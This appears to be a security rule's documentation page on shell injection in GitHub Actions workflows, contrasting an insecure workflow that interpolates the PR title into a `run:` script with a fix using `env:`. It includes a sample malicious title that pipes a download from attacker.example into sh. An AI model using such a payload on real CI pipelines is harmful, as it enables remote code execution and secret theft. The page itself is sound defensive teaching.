
GitHub Action with shell injection

Checks for GitHub Actions workflows where untrusted attributes controllable by the pull request author (for example the PR title or body) are interpolated directly into a `run:` script, which can lead to arbitrary code execution on the runner.

Examples

Insecure Example

on:
  pull_request:
jobs:
  docker-build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Show pull request title
        run: |
          # The runner expands ${{ }} into the script text before bash runs it,
          # so a title containing "; <command>; echo " is executed as shell code.
          echo "${{ github.event.pull_request.title }}" # This is subject to shell injection

Secure Example

Avoid using untrusted, user-controllable attributes directly, especially in shell scripts. Pass the value into the step through an environment variable (`env:`) and reference it from the script as "$VAR": the expression is still evaluated by the runner, but its value lands in the process environment instead of the script text, so the shell treats it as data rather than as part of the command.
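The following workflow is an added example of the fix, not code from the original page. It is the insecure workflow above with the title moved into `env:`; the variable name `TITLE` is an arbitrary choice. A constructed malicious title such as `fix"; curl http://attacker.example/x | sh; echo "` is printed verbatim here, whereas in the insecure version the runner would have spliced it into the script and bash would have run the embedded command.

```yaml
on:
  pull_request:
jobs:
  docker-build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Show pull request title
        env:
          # The expression is evaluated by the runner and placed in the step's
          # environment; it is never substituted into the script text.
          TITLE: ${{ github.event.pull_request.title }}
        run: |
          # Double quotes keep the value a single word; bash expands it as data,
          # so quotes, semicolons and backticks in the title are not interpreted.
          echo "$TITLE"
```

The same pattern applies to every other attacker-controlled context value (PR body, branch name, commit message, issue or comment body). Be especially careful in workflows triggered by `pull_request_target` or `issue_comment`, which run with repository secrets and a write-capable token, so an injection there is far more damaging than in a plain `pull_request` job.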